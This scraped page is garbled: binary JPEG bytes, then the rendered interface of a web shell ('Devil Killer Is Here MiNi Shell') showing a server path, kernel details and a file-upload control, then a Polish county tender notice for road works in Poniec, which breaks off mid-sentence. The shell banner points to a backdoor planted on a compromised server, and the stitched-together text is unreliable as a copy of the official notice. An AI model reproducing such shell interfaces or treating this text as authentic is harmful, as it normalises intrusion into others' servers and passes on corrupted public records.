JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250718/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250718/0033471501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa infrastruktury drogowej i bezpieczeństwa ruchu w ciągach dróg powiatowych na terenie gminy Poniec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Gostyński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411103561</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wrocławska 256</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gostyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@powiat.gostyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.powiat.gostyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa infrastruktury drogowej i bezpieczeństwa ruchu w ciągach dróg powiatowych na terenie gminy Poniec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7298024-b560-423a-be1c-48303c096d5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00334715</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00064743/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.19 Modernizacja drogi powiatowej nr 4803P Poniec – Krobia, ul. Kusza w Poniecu</p> <p class="mb-0">1.1.20 Oczyszczenie i reprofilacja istniejącego rowu w ciągu ul. Kusza / Krobska Szosa w Poniecu</p> <p class="mb-0">1.1.21 Poprawa bezpieczeństwa niechronionych użytkowników ruchu na drodze powiatowej nr 4941P w miejscowości Żytowiecko przy szkole</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_gostyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_gostyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta,wniosek oraz przedmiotowe<br/>środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym<br/>podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków<br/>dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty wykonawca składa<br/>bezpośrednio na dokumencie, który następnie przesyła do systemu. 2. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U.z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer<br/>klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany program<br/>Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą<br/>protokołu TLS 1.3.g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.3. Podpisy kwalifikowane<br/>wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego<br/>i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym<br/>(eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku” W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający<br/>wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.4.<br/>Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.5. Rozszerzenia plików przez wykonawców<br/>powinny być zgodne z OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia<br/>jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”6.<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. W przypadku problemów technicznych związanych z<br/>obsługą platformazakupowa.pl Zamawiający dopuszcza kontakt przy użyciu poczty elektronicznej przetargi@powiat.gostyn.pl jako<br/>kanału pomocniczego w sytuacjach awaryjnych.6. Szczegółowe informacje techniczne i organizacyjne dot. korespondencji<br/>elektronicznej zawarto w rozdziale XI oraz w XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami z rozdziału III SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami z rozdziału III SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WI.272.2.11.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Część I - Modernizacja drogi powiatowej nr 4803P Poniec - Krobia ulica Kusza<br/>Przedmiotem zamówienia jest modernizacja drogi powiatowej nr 4803P Poniec - Krobia ul. Kusza. Długość odcinka drogi objętego opracowaniem wynosi 108m. Całość inwestycji zlokalizowana jest w granicach działki o numerze ewidencyjnym 855, obręb Wydawy.<br/>W ramach inwestycji przewidziano:<br/>- rozbiórkę krawężników, obrzeży oraz istniejącej nawierzchni drogi, chodników i zjazdów,<br/>- zabezpieczenie istniejących drzew przed zniszczeniem w czasie budowy,<br/>- frezowanie istniejącej nawierzchni,<br/>- przebudowę kanalizacji deszczowej w zakresie montażu przykanalików i wpustów deszczowych,<br/>- ustawienie krawężników i obrzeży,<br/>- wzmocnienie konstrukcji nawierzchni jezdni,<br/>- wykonanie chodnika i ścieżki pieszo-rowerowej z kostki betonowej,<br/>- przebudowę istniejących zjazdów,<br/>- wymianę istniejących i montaż nowych znaków pionowych,<br/>- wykonanie oznakowania poziomego.<br/><br/><br/><br/>Szczegółowo przedmiot zamówienia opisują ogólne specyfikacje techniczne wykonania i odbioru robót, dokumentacja techniczna oraz przedmiar robót dla Części I zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) 60 pkt.<br/>2 Gwarancja (G) 40 pkt.<br/>Oferta po uwzględnieniu wag może uzyskać maksymalną ilość punktów tj. 100 pkt.:<br/>za najniższą cenę – 60 pkt.<br/>za najdłuższy okres gwarancji – 40 pkt.<br/>W kryterium „cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C= C_min/C_n *60 pkt.<br/>Gdzie:<br/>C – ilość punktów dla badanej oferty<br/>Cmin – najniższa cena brutto<br/>Cn – cena badanej oferty brutto<br/>Oferta o najniższej cenie brutto uzyska maksymalną ilość punktów – 60 pkt. Pozostałe ceny obliczane dla badanych ofert zostaną<br/>porównane z ofertą o najkorzystniejszej (najniższej) cenie brutto oferty. Sumę oceny tego kryterium stanowić będzie liczba<br/>uzyskanych punktów pomnożona przez współczynnik odpowiadający wadze kryterium „cena”. Uzyskana liczba punktów w ramach<br/>kryterium zaokrąglona będzie do drugiego miejsca po przecinku.<br/>W kryterium „okres gwarancji” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Gwarancja= G_b/G_max *40 pkt<br/>Gdzie:<br/>G – ilość punktów przyznana w ofercie kryterium „ okres gwarancji”<br/>Gb – termin gwarancji w badanej ofercie<br/>Gmax – najdłuższy zaoferowany okres gwarancji spośród badanych ofert<br/>UWAGA! Okres gwarancji należy podać w miesiącach w formularzu ofertowym (załącznik nr 1 do SWZ).<br/>Zamawiający wymaga minimum 36-miesięcznego okresu gwarancji (3 lata). W przypadku podania przez Wykonawcę krótszego niż<br/>wymagany okres gwarancji lub niepodanie (wpisanie) terminu gwarancji, oferta Wykonawcy zostanie odrzucona jako niezgodną z<br/>SWZ. Maksymalną ilość punktów otrzyma wykonawca, który zaoferuje, co najmniej 60 miesięczny okres gwarancji. Jeżeli<br/>Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy (5 lat) do oceny ofert zostanie przyjęty okres 60 miesięcy<br/>i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy okres (60 miesięcy) otrzymuje<br/>maksymalną liczbę punktów w ramach kryterium „okres gwarancji”.<br/>Łączna liczba punktów zostanie obliczona, jako suma uzyskanych punktów w ww. kryteriach zgodnie z poniższym wzorem:<br/>P = C + G<br/>Gdzie:<br/>P – łączna liczba punktów uzyskanych w kryteriach<br/>C – liczba punktów przyznana danej ofercie w kryterium „cena”<br/>G – liczba punktów przyznana danej ofercie w kryterium „okres gwarancji”<br/>Punktacja przyznawana ofertom w kryteriach oceny ofert „Cena” i „Gwarancja” będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2) Część II – Oczyszczenie i reprofilacja istniejącego rowu w ciągu ul. Kusza / Krobska Szosa w Poniecu<br/><br/>Przedmiotem zamówienia jest realizacja robót budowlanych polegających na oczyszczeniu i reprofilacji istniejącego rowu wraz z niezbędną przebudową elementów drogowych w ciągu ulicy Kusza / Krobska Szosa w Poniecu. <br/>Zamówienie ma na celu poprawę warunków odwodnienia drogi oraz zapewnienie właściwego stanu technicznego nawierzchni i otoczenia pasa drogowego.<br/>Zakres prac obejmuje w szczególności:<br/>- roboty przygotowawcze, w tym odtworzenie trasy i punktów wysokościowych, zdjęcie humusu oraz rozbiórkę elementów istniejącej infrastruktury drogowej (nawierzchni, krawężników, obrzeży, przepustów).<br/>- roboty ziemne, w tym wykonanie wykopów, nasypów, plantowanie skarp, humusowanie z obsianiem oraz oczyszczenie rowu z namułu z reprofilacją dna i skarp.<br/>- wykonanie odwodnienia korpusu drogowego, w tym przebudowa przepustów z rur PEHD oraz montaż studni rewizyjnych.<br/>- wykonanie konstrukcji nawierzchni, obejmujące korytowanie, podbudowy z kruszyw i betonu asfaltowego, warstwy wiążące i ścieralne z SMA.<br/>- elementy wykończeniowe, w tym ustawienie nowych krawężników i obrzeży betonowych oraz wykonanie chodników z kostki brukowej betonowej.<br/>Szczegółowo przedmiot zamówienia opisują ogólne specyfikacje techniczne oraz przedmiar robót oraz plan sytuacyjny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) 60 pkt.<br/>2 Gwarancja (G) 40 pkt.<br/>Oferta po uwzględnieniu wag może uzyskać maksymalną ilość punktów tj. 100 pkt.:<br/>za najniższą cenę – 60 pkt.<br/>za najdłuższy okres gwarancji – 40 pkt.<br/>W kryterium „cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C= C_min/C_n *60 pkt.<br/>Gdzie:<br/>C – ilość punktów dla badanej oferty<br/>Cmin – najniższa cena brutto<br/>Cn – cena badanej oferty brutto<br/>Oferta o najniższej cenie brutto uzyska maksymalną ilość punktów – 60 pkt. Pozostałe ceny obliczane dla badanych ofert zostaną<br/>porównane z ofertą o najkorzystniejszej (najniższej) cenie brutto oferty. Sumę oceny tego kryterium stanowić będzie liczba<br/>uzyskanych punktów pomnożona przez współczynnik odpowiadający wadze kryterium „cena”. Uzyskana liczba punktów w ramach<br/>kryterium zaokrąglona będzie do drugiego miejsca po przecinku.<br/>W kryterium „okres gwarancji” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Gwarancja= G_b/G_max *40 pkt<br/>Gdzie:<br/>G – ilość punktów przyznana w ofercie kryterium „ okres gwarancji”<br/>Gb – termin gwarancji w badanej ofercie<br/>Gmax – najdłuższy zaoferowany okres gwarancji spośród badanych ofert<br/>UWAGA! Okres gwarancji należy podać w miesiącach w formularzu ofertowym (załącznik nr 1 do SWZ).<br/>Zamawiający wymaga minimum 36-miesięcznego okresu gwarancji (3 lata). W przypadku podania przez Wykonawcę krótszego niż<br/>wymagany okres gwarancji lub niepodanie (wpisanie) terminu gwarancji, oferta Wykonawcy zostanie odrzucona jako niezgodną z<br/>SWZ. Maksymalną ilość punktów otrzyma wykonawca, który zaoferuje, co najmniej 60 miesięczny okres gwarancji. Jeżeli<br/>Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy (5 lat) do oceny ofert zostanie przyjęty okres 60 miesięcy<br/>i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy okres (60 miesięcy) otrzymuje<br/>maksymalną liczbę punktów w ramach kryterium „okres gwarancji”.<br/>Łączna liczba punktów zostanie obliczona, jako suma uzyskanych punktów w ww. kryteriach zgodnie z poniższym wzorem:<br/>P = C + G<br/>Gdzie:<br/>P – łączna liczba punktów uzyskanych w kryteriach<br/>C – liczba punktów przyznana danej ofercie w kryterium „cena”<br/>G – liczba punktów przyznana danej ofercie w kryterium „okres gwarancji”<br/>Punktacja przyznawana ofertom w kryteriach oceny ofert „Cena” i „Gwarancja” będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	Część III – Poprawa bezpieczeństwa niechronionych użytkowników ruchu na drodze powiatowej nr 4941P w miejscowości Żytowiecko przy szkole.<br/> Przedmiotem zamówienia jest poprawa bezpieczeństwa niechronionych <br/> użytkowników ruchu na drodze powiatowej nr 4941P w miejscowości <br/> Żytowiecko, 